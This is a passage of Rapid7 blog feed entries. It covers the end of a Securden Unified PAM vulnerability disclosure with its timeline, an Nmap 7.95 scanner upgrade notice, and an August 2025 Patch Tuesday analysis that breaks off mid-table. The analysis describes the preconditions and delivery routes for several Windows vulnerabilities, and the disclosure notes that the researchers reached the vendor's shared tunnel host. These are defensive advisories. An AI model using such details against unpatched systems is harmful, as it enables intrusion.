style='font-size: undefined;'>Realizing that this server was Securden’s infrastructure with shared connections between multiple software deployments, Rapid7 exited the host. Rapid7 then reviewed the Unified PAM application’s functionality, focusing in on what created the SSH tunnel and where it was being used. Rapid7 discovered that it was a part of the </span><span style='font-size: undefined;'><span data-type='inlineCode'>Vendor Access Portal</span></span><span style='font-size: undefined;'>, which allows customers to expose a vendor login page on the internet to their internally-hosted Unified PAM instance. However, while testing with different deployed instances and </span><span style='font-size: undefined;'><span data-type='inlineCode'>vendor names</span></span><span style='font-size: undefined;'>, Rapid7 observed that the key generation process, username, and host IP address SSHed into and used to establish this tunnel were the same across installations.</span></p><h2>Remediation</h2><p style="direction: ltr;"><span style='font-size: undefined;'>To remediate the issues described in this disclosure, customers should update Securden Unified PAM to version 11.4.4 or higher. Securden has declined to publish a public advisory on these issues. More details about Securden Unified PAM can be found </span><a href="https://www.securden.com/privileged-account-manager/index.html"><span style='font-size: undefined;'>here</span></a><span style='font-size: undefined;'>.</span></p><h2>Rapid7 customers</h2><p style="direction: ltr;">Nexpose and InsightVM customers can assess their exposure to CVE-2025-53118, CVE-2025-53119, CVE-2025-53120, and CVE-2025-6737 with unauthenticated/remote checks made available in the August 25 content release.</p><h2>Disclosure timeline</h2><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>May 2025:</strong></span><span style='font-size: undefined;'> First three vulnerabilities (CVE-2025-53118, CVE-2025-53119, CVE-2025-53120) discovered by Marcus Chang, Vendor Portal vulnerabilities (CVE-2025-6737) discovered by Aaron Herndon, both of Rapid7.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>May 22, 2025:</strong></span><span style='font-size: undefined;'> Initial email to Securden asking for confirmation of a point of contact to send vulnerability information.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>May 22, 2025:</strong></span><span style='font-size: undefined;'> Securden confirmed the point of contact.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>May 22, 2025:</strong></span><span style='font-size: undefined;'> Vulnerability details provided to Securden.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>May 30, 2025:</strong></span><span style='font-size: undefined;'> Securden sent patch intended to remediate the issues.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>June 3, 2025:</strong></span><span style='font-size: undefined;'> Rapid7 tested the patch and confirmed all vulnerabilities were remediated.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>June 5, 2025:</strong></span><span style='font-size: undefined;'> Aaron Herndon reported further vulnerabilities with the Vendor Portal functionality.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>June 6, 2025:</strong></span><span style='font-size: undefined;'> Securden provided another patch intended to remediate newly identified vulnerabilities.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>June 9, 2025:</strong></span><span style='font-size: undefined;'> Rapid7 tested the patch provided on June 6 and confirmed vulnerabilities discovered on June 5 were remediated.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>June 26, 2025:</strong></span><span style='font-size: undefined;'> Securden provided a general timeframe for public disclosure.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>July 29, 2025:</strong></span><span style='font-size: undefined;'> Securden provided a specific public disclosure date.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>July 29, 2025:</strong></span><span style='font-size: undefined;'> Rapid7 requested a different public disclosure date.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>July 29, 2025:</strong></span><span style='font-size: undefined;'> Rapid7 informed Securden of the assigned CVE IDs.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>August 5, 2025:</strong></span><span style='font-size: undefined;'> Securden provided a specific public disclosure date.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>August 21, 2025:</strong></span><span style='font-size: undefined;'> Rapid7 requested specific vulnerable version numbers.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>August 21, 2025:</strong></span><span style='font-size: undefined;'> Securden provided specific vulnerable version numbers.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>August 22, 2025:</strong></span><span style='font-size: undefined;'> Securden provided Vendor Statement.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>August 25, 2025:</strong></span><span style='font-size: undefined;'> Public disclosure via publication of this blog post.</span></p></li></ul>]]></description>
      <link>https://www.rapid7.com/blog/post/securden-unified-pam-multiple-critical-vulnerabilities-fixed</link>
      <guid isPermaLink="false">blt5bf5fc2194f1489c</guid>
      <category><![CDATA[Vulnerability Disclosure]]></category>
      <category><![CDATA[Vulnerability Management]]></category><dc:creator><![CDATA[Aaron Herndon]]></dc:creator>
      <pubDate>Mon, 25 Aug 2025 16:00:00 GMT</pubDate><media:content url="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt65a432ba319f4043/6846abddaf18306debe6cf4d/ETR.webp" medium="image" />
    </item>
    <item>
      <title><![CDATA[Announcing Nmap 7.95 Upgrade and More Accurate Simple Network Management Protocol (SNMP) Fingerprinting]]></title>
      <description><![CDATA[<p style="direction: ltr;"><span style='font-size: undefined;'>At Rapid7, our commitment is to provide you with the most accurate and reliable scan data possible; as such, we are continuously updating our underlying technology. Today we are excited to announce an upcoming enhancement to the InsightVM scan engine, aimed at improving the accuracy of Simple Network Management Protocol (SNMP) fingerprinting in unauthenticated scans and reducing false positives in your scan results.</span></p><h2>What's changing?</h2><p style="direction: ltr;"><span style='font-size: undefined;'>InsightVM is being upgraded to use a newer version of Nmap, moving from </span><span style='font-size: undefined;'><strong>version 7.92 to 7.95</strong></span><span style='font-size: undefined;'>, bringing significant improvements to how UDP ports are assessed. Our testing has revealed that the new version of Nmap is much more precise in identifying ambiguous ports, resulting in a significant decrease in ports being definitively marked as </span><span style='font-size: undefined;'><span data-type='inlineCode'>closed</span></span><span style='font-size: undefined;'> and a corresponding increase in ports being correctly identified as </span><span style='font-size: undefined;'><span data-type='inlineCode'>open|filtered</span></span><span style='font-size: undefined;'>.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>This industry-wide improvement highlighted that our existing method for handling the ambiguous </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>open|filtered</span></span><span style='font-size: undefined;'> state during </span><span style='font-size: undefined;'><strong>unauthenticated SNMPv1 and SNMPv2 fingerprinting</strong></span><span style='font-size: undefined;'> could report false positives to customers. With the new UDP port detection in Nmap, the frequency of these false positives would likely increase, so we have updated our fingerprinting process to be more reliable.</span></p><h2>Increasing reliability and reducing false positives</h2><p style="direction: ltr;"><span style='font-size: undefined;'>For unauthenticated scans, our platform will now adopt a more direct approach to identifying SNMP services. This change is designed to deliver more accurate results and reduce the noise from potential false positives. </span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Authenticated scans that use valid SNMP credentials are not affected by this change. Also, due to the nature of the protocol, this update does not affect SNMPv3 scanning.</span></p><h2>What this means for your scans</h2><p style="direction: ltr;"><span style='font-size: undefined;'>With this new, more accurate behavior, reliable fingerprinting of SNMPv1 and v2 services will be achieved under the following conditions:</span></p><ol><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>An unauthenticated scan</strong></span><span style='font-size: undefined;'> against an SNMP asset that is using one of the common, default community strings that our scanner checks for.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>An authenticated scan</strong></span><span style='font-size: undefined;'> against any SNMP asset where you have provided valid credentials.</span></p></li></ol><p style="direction: ltr;"><span style='font-size: undefined;'>A key benefit of this change is a reduction in false positives, particularly for certain types of SNMPv1 and SNMPv2 servers. </span></p><h2><span style='font-size: undefined;'>Which SNMPv1 and SNMPv2 servers will see this change?</span></h2><p style="direction: ltr;"><span style='font-size: undefined;'>This change is unlikely to affect most </span><span style='font-size: undefined;'><strong>Linux</strong></span><span style='font-size: undefined;'> SNMPv1 and SNMPv2 servers, as they typically respond with an authentication error to incorrect community strings, allowing our scanner to confirm the service is running. </span></p><p style="direction: ltr;"><span style='font-size: undefined;'>The native SNMP service on </span><span style='font-size: undefined;'><strong>Windows</strong></span><span style='font-size: undefined;'> is designed to silently drop packets when a non-default community string is used. Our previous method may have incorrectly flagged these </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>open|filtered</span></span><span style='font-size: undefined;'> ports as a running service. With the new logic, our scanner will no longer attempt to fingerprint SNMP in these ambiguous cases, significantly improving accuracy for these assets. This also applies to </span><span style='font-size: undefined;'><strong>other network devices</strong></span><span style='font-size: undefined;'> that adopt a similar "silent drop" security posture.</span></p><h2>Our recommendations</h2><p style="direction: ltr;"><span style='font-size: undefined;'>For the most accurate and reliable fingerprinting of your SNMPv1 and v2 servers, </span><span style='font-size: undefined;'><strong>we strongly recommend configuring your scans with credentials.</strong></span><span style='font-size: undefined;'> Authenticated scanning is a security best practice that provides the most detailed and accurate information about the services running on your assets.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>We are confident that this enhancement will improve the quality of your scan data and help you focus on what matters most.</span></p><hr><p style="direction: ltr;"><span style='font-size: undefined;'><em>You can check out Rapid7’s Vulnerability Management solution, InsightVM, in greater detail </em></span><a href="https://www.rapid7.com/products/insightvm/"><span style='font-size: undefined;'>here</span></a><span style='font-size: undefined;'><em>.</em></span></p>]]></description>
      <link>https://www.rapid7.com/blog/post/announcing-nmap-7-95-upgrade-and-more-accurate-simple-network-management-protocol-fingerprinting</link>
      <guid isPermaLink="false">bltee406d18b65144aa</guid>
      <category><![CDATA[Vulnerability Management]]></category>
      <category><![CDATA[InsightVM]]></category><dc:creator><![CDATA[Conor McCormick]]></dc:creator>
      <pubDate>Fri, 15 Aug 2025 13:00:00 GMT</pubDate><media:content url="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt44d1c4df2ea08e27/67c8409fc1fe9636d8552a0d/product-ui-disco.png" medium="image" />
    </item>
    <item>
      <title><![CDATA[Patch Tuesday - August 2025]]></title>
      <description><![CDATA[<p style="direction: ltr;"><span style='font-size: undefined;'>Microsoft is addressing 111 vulnerabilities this </span><a href="https://msrc.microsoft.com/update-guide/releaseNote/2025-Aug"><span style='font-size: undefined;'>August 2025 Patch Tuesday</span></a><span style='font-size: undefined;'>, a volume which is around the recent average. In a neat parallel with last month, Microsoft is aware of public disclosure for a single one of the vulnerabilities published today, and claims no evidence of in-the-wild exploitation. Once again, the lone Patch Tuesday zero-day vulnerability is assessed as only moderate severity at time of publication, which brings Microsoft’s lucky streak up to 11 months. Today’s release includes the publication of nine critical remote code execution (RCE) vulnerabilities, although Microsoft has only marked one of these as more likely to see exploitation. Eight browser vulnerabilities have already been published separately this month, and are not included in the total.</span></p><h3 style="direction: ltr;"><span style='color:rgb(67, 67, 67);'>Kerberos: zero-day EoP</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>What do attackers want in a Windows context? Domain admin! When do they want it? Now! Today’s lone zero-day vulnerability might be just what they need to break through the final layers of protection and swipe the crown jewels. </span><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-53779"><span style='font-size: undefined;'>CVE-2025-53779</span></a><span style='font-size: undefined;'> is an elevation of privilege (EoP) vulnerability in the Windows implementation of Kerberos, which is enabled via abuse of dMSA configuration. The advisory FAQ provides more clues as to the nature of the attack than many comparable Microsoft advisories, but misses a golden opportunity for clarity, since it never sets out what it means by dMSA, leaving us scouring for contextual clues. Ultimately, we can determine from context that today’s hot topic is the </span><a href="https://learn.microsoft.com/en-us/windows-server/identity/ad-ds/manage/delegated-managed-service-accounts/delegated-managed-service-accounts-overview"><span style='font-size: undefined;'>Delegated Managed Service Account</span></a><span style='font-size: undefined;'>, rather than the Defender Microservices Architecture or some other piece of Microsoft paraphernalia with matching initials. Microsoft’s motivation is unimpeachable: the dMSA supports automated rotation of credentials for service accounts, and is specifically designed to prevent credential harvesting using </span><a href="https://www.rapid7.com/fundamentals/kerberoasting-attack/"><span style='font-size: undefined;'>Kerberoasting</span></a><span style='font-size: undefined;'>. Indeed, </span><a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-278a"><span style='font-size: undefined;'>CISA has described Kerberoasting</span></a><span style='font-size: undefined;'> as one of the most time-efficient ways to elevate privileges and move laterally throughout an organization’s network.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>The good news here is that successful exploitation of </span><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-53779"><span style='font-size: undefined;'>CVE-2025-53779</span></a><span style='font-size: undefined;'> requires an attacker to have pre-existing control of two attributes of the hopefully well protected dMSA: </span><a href="https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-ada2/c651f64d-5e92-4d12-9011-e6811ed306aa"><span style='font-size: undefined;'>msds-groupMSAMembership</span></a><span style='font-size: undefined;'>, which determines which users may use credentials for the managed service account, and </span><a href="https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-ada2/6ce9e113-5c1e-4ba3-8078-419dd4e33561"><span style='font-size: undefined;'>msds-ManagedAccountPrecededByLink</span></a><span style='font-size: undefined;'>, which contains a list of users on whose behalf the dMSA can act. However, abuse of </span><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-53779"><span style='font-size: undefined;'>CVE-2025-53779</span></a><span style='font-size: undefined;'> is certainly plausible as the final link of a multi-exploit chain which stretches from no access to total pwnage. Finally, it’s important to note that Microsoft is only publishing patches for Windows Server 2025, and that’s because msds-ManagedAccountPrecededByLink was first implemented in Server 2025. Migrating to newer operating systems sooner rather than later remains good advice, but so is remediation of zero-day vulnerabilities which could give an attacker total control of your estate.</span></p><h3 style="direction: ltr;"><span style='color:rgb(67, 67, 67);'>Windows Graphics: critical RCE</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>The publication of any pre-authentication RCE in Windows will naturally spark discussion. Of course, not all pre-auth RCEs are created equal, and while </span><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-50165"><span style='font-size: undefined;'>CVE-2025-50165</span></a><span style='font-size: undefined;'> has a hefty CVSSv3 base score of 9.8, and is certainly a cause for concern, it is not the worst of the worst, since it presumably isn’t wormable. Despite that, a degree of alarm is amply justified, since the advisory FAQ mentions — twice! — that user interaction isn’t required. Exploitation is via a malicious JPEG file, which could be delivered within an Office document or other means; perhaps even visiting a website would be sufficient, or receiving an email within Outlook, although the advisory doesn’t explicitly confirm or deny these other possible attack routes. The malformed JPEG tricks the Windows Graphics Component into code execution via an untrusted pointer dereference. The context of execution isn’t specified, so in the standard spirit of caution, we’ll assume SYSTEM. This is hardly a new class of problem: we can cast our minds back a dozen years, for instance, and consider the broadly similar </span><a href="https://learn.microsoft.com/en-us/security-updates/SecurityBulletins/2013/ms13-096"><span style='font-size: undefined;'>MS13-096</span></a><span style='font-size: undefined;'>. However, the specific flaw underlying </span><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-50165"><span style='font-size: undefined;'>CVE-2025-50165</span></a><span style='font-size: undefined;'> is presumably a recent introduction, since only Windows 11 24H2 and Server 2025 receive patches. Patch this one sooner rather than later, since it could provide a skilled attacker with a valuable foothold from which to launch further attacks, including perhaps even today’s </span><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-53779"><span style='font-size: undefined;'>CVE-2025-53779</span></a><span style='font-size: undefined;'>.</span></p><h3 style="direction: ltr;"><span style='color:rgb(67, 67, 67);'>Windows GDI+: critical RCE</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>The Windows GDI+ (Graphics Device Interface Plus) is at the center of how almost all two-dimensional graphics are rendered on Windows assets. </span><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-53766"><span style='font-size: undefined;'>CVE-2025-53766</span></a><span style='font-size: undefined;'> is a critical RCE in how GDI+ interprets metafiles, which are often used to store vector graphics. An attacker can achieve code execution via buffer overflow without privileges or user interaction. As with today’s </span><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-50165"><span style='font-size: undefined;'>CVE-2025-50165</span></a><span style='font-size: undefined;'>, it’s unlikely that this vulnerability could be wormable, but the most alarming path to exploitation involved simply uploading a malicious metafile to a Windows machine running unspecified web services. There is no mention of SharePoint, Exchange, Office, or other non-Windows products in the Security Updates section of the advisory, but that still leaves an essentially limitless potential attack surface; for example, anyone running a custom ASP.NET application offering file uploads could find themselves vulnerable to an attacker wielding a dodgy WMF file. On the bright side, the Preview Pane is not a vector in this case. A patch is available for Server 2008, but not Server 2012, a curious and possibly concerning pattern that we see from time to time with RCEs which affect the full historic range of Windows products.</span></p><h3 style="direction: ltr;"><span style='color:rgb(67, 67, 67);'>DirectX graphics kernel: critical RCE</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>Today is certainly a good day for fans of critical RCE vulnerabilities which target weaknesses in how Windows interprets graphics. Exploitation of </span><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-50176"><span style='font-size: undefined;'>CVE-2025-50176</span></a><span style='font-size: undefined;'>, a flaw in the DirectX graphics kernel, could lead to execution in a kernel context. Microsoft considers exploitation more likely, which may be why the advisory doesn’t provide a great deal of information about the means of exploitation, beyond a terse statement that type confusion is involved. Type confusion is where the kernel receives a pointer which it expects to be for one type of object, but is in fact for another, which is a bit like asking someone to read out loud from a restaurant menu, but then handing them their secret diary and hoping they won’t notice the difference. Most people will not be fooled, but under the right circumstances, anything is possible.</span></p><h3 style="direction: ltr;"><span style='color:rgb(67, 67, 67);'>Microsoft lifecycle update</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>There are no significant changes to Microsoft product lifecycles this month. However, October will bring a flurry of changes, including the categorical </span><a href="https://support.microsoft.com/en-us/windows/windows-10-support-ends-on-october-14-2025-2ca8b313-1946-43d3-b55c-2b95b107f281"><span style='font-size: undefined;'>end of support for non-LTSC versions of Windows 10</span></a><span style='font-size: undefined;'>.</span></p><h2><span style='font-size: undefined;'>Summary charts</span></h2><h2><span style='font-size: undefined;'></span></h2><figure style="margin: 0; text-align: center"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt6d2c4c88850f4100/689bb2412ac92281c5a8811a/2025-08-vuln_count_impact.png" alt="Microsoft Patch Tuesday August 2025: a bar chart showing vulnerability count by impact" class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="Microsoft Patch Tuesday August 2025: a bar chart showing vulnerability count by impact" style="text-align: center; width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt6d2c4c88850f4100/689bb2412ac92281c5a8811a/2025-08-vuln_count_impact.png" data-sys-asset-uid="blt6d2c4c88850f4100" data-sys-asset-filename="2025-08-vuln_count_impact.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="Microsoft Patch Tuesday August 2025: a bar chart showing vulnerability count by impact" data-sys-asset-position="center" sys-style-type="display"/></figure><p></p><figure style="margin: 0; text-align: center"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt18c243127d3a456d/689bb24128f7ab4b52d28955/2025-08-vuln_count_impact-component-heatmap.png" alt="Microsoft Patch Tuesday August 2025: a heatmap showing vulnerability count by component by impact" class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="Microsoft Patch Tuesday August 2025: a heatmap showing vulnerability count by component by impact" style="text-align: center; width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt18c243127d3a456d/689bb24128f7ab4b52d28955/2025-08-vuln_count_impact-component-heatmap.png" data-sys-asset-uid="blt18c243127d3a456d" data-sys-asset-filename="2025-08-vuln_count_impact-component-heatmap.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="Microsoft Patch Tuesday August 2025: a heatmap showing vulnerability count by component by impact" data-sys-asset-position="center" sys-style-type="display"/></figure><p></p><figure style="margin: 0; text-align: center"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltf898276858fcef6a/689bb241dac0e5d7eb3993c6/2025-08-vuln_count_component.png" alt="Microsoft Patch Tuesday August 2025: a bar chart showing vulnerability count by component" class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="Microsoft Patch Tuesday August 2025: a bar chart showing vulnerability count by component" style="text-align: center; width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltf898276858fcef6a/689bb241dac0e5d7eb3993c6/2025-08-vuln_count_component.png" data-sys-asset-uid="bltf898276858fcef6a" data-sys-asset-filename="2025-08-vuln_count_component.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="Microsoft Patch Tuesday August 2025: a bar chart showing vulnerability count by component" data-sys-asset-position="center" sys-style-type="display"/></figure><h2>Summary tables</h2><p></p><h3>Apps vulnerabilities</h3><table><thead><tr><th><p>CVE</p></th><th><p>Title</p></th><th><p>Exploited?</p></th><th><p>Publicly disclosed?</p></th><th><p>CVSSv3 base score</p></th></tr></thead><tbody><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-53787">CVE-2025-53787</a></td><td><p>Microsoft 365 Copilot BizChat Information Disclosure Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>8.2</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-53774">CVE-2025-53774</a></td><td><p>Microsoft 365 Copilot BizChat Information Disclosure Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>6.5</p></td></tr></tbody></table><h3>Azure vulnerabilities</h3><table><thead><tr><th><p>CVE</p></th><th><p>Title</p></th><th><p>Exploited?</p></th><th><p>Publicly disclosed?</p></th><th><p>CVSSv3 base score</p></th></tr></thead><tbody><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-53767">CVE-2025-53767</a></td><td><p>Azure OpenAI Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>10</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-53792">CVE-2025-53792</a></td><td><p>Azure Portal Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>9.1</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-49707">CVE-2025-49707</a></td><td><p>Azure Virtual Machines Spoofing Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.9</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-53729">CVE-2025-53729</a></td><td><p>Microsoft Azure File Sync Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-53781">CVE-2025-53781</a></td><td><p>Azure Virtual Machines Information Disclosure Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.7</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-53793">CVE-2025-53793</a></td><td><p>Azure Stack Hub Information Disclosure Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-53765">CVE-2025-53765</a></td><td><p>Azure Stack Hub Information Disclosure Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>4.4</p></td></tr></tbody></table><h3>Browser vulnerabilities</h3><table><thead><tr><th><p>CVE</p></th><th><p>Title</p></th><th><p>Exploited?</p></th><th><p>Publicly disclosed?</p></th><th><p>CVSSv3 base score</p></th></tr></thead><tbody><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-49736">CVE-2025-49736</a></td><td><p>Microsoft Edge (Chromium-based) for Android Spoofing Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>4.3</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-49755">CVE-2025-49755</a></td><td><p>Microsoft Edge (Chromium-based) for Android Spoofing Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>4.3</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-8583">CVE-2025-8583</a></td><td><p>Chromium: CVE-2025-8583 Inappropriate implementation in Permissions</p></td><td><p>No</p></td><td><p>No</p></td><td><p>N/A</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-8582">CVE-2025-8582</a></td><td><p>Chromium: CVE-2025-8582 Insufficient validation of untrusted input in DOM</p></td><td><p>No</p></td><td><p>No</p></td><td><p>N/A</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-8581">CVE-2025-8581</a></td><td><p>Chromium: CVE-2025-8581 Inappropriate implementation in Extensions</p></td><td><p>No</p></td><td><p>No</p></td><td><p>N/A</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-8580">CVE-2025-8580</a></td><td><p>Chromium: CVE-2025-8580 Inappropriate implementation in Filesystems</p></td><td><p>No</p></td><td><p>No</p></td><td><p>N/A</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-8579">CVE-2025-8579</a></td><td><p>Chromium: CVE-2025-8579 Inappropriate implementation in Gemini Live in Chrome</p></td><td><p>No</p></td><td><p>No</p></td><td><p>N/A</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-8578">CVE-2025-8578</a></td><td><p>Chromium: CVE-2025-8578 Use after free in Cast</p></td><td><p>No</p></td><td><p>No</p></td><td><p>N/A</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-8577">CVE-2025-8577</a></td><td><p>Chromium: CVE-2025-8577 Inappropriate implementation in Picture In Picture</p></td><td><p>No</p></td><td><p>No</p></td><td><p>N/A</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-8576">CVE-2025-8576</a></td><td><p>Chromium: CVE-2025-8576 Use after free in Extensions</p></td><td><p>No</p></td><td><p>No</p></td><td><p>N/A</p></td></tr></tbody></table><h3>Developer Tools vulnerabilities</h3><table><thead><tr><th><p>CVE</p></th><th><p>Title</p></th><th><p>Exploited?</p></th><th><p>Publicly disclosed?</p></th><th><p>CVSSv3 base score</p></th></tr></thead><tbody><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-53772">CVE-2025-53772</a></td><td><p>Web Deploy Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>8.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-53773">CVE-2025-53773</a></td><td><p>GitHub Copilot and Visual Studio Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr></tbody></table><h3>Device Microsoft Office vulnerabilities</h3><table><thead><tr><th><p>CVE</p></th><th><p>Title</p></th><th><p>Exploited?</p></th><th><p>Publicly disclosed?</p></th><th><p>CVSSv3 base score</p></th></tr></thead><tbody><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-53783">CVE-2025-53783</a></td><td><p>Microsoft Teams Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.5</p></td></tr></tbody></table><h3>ESU Windows vulnerabilities</h3><table><thead><tr><th><p>CVE</p></th><th><p>Title</p></th><th><p>Exploited?</p></th><th><p>Publicly disclosed?</p></th><th><p>CVSSv3 base score</p></th></tr></thead><tbody><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-49757">CVE-2025-49757</a></td><td><p>Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>8.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-50163">CVE-2025-50163</a></td><td><p>Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>8.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-53778">CVE-2025-53778</a></td><td><p>Windows NTLM Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>8.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-53143">CVE-2025-53143</a></td><td><p>Microsoft Message Queuing (MSMQ) Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>8.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-53144">CVE-2025-53144</a></td><td><p>Microsoft Message Queuing (MSMQ) Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>8.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-53145">CVE-2025-53145</a></td><td><p>Microsoft Message Queuing (MSMQ) Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>8.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-50177">CVE-2025-50177</a></td><td><p>Microsoft Message Queuing (MSMQ) Remote Code Execution 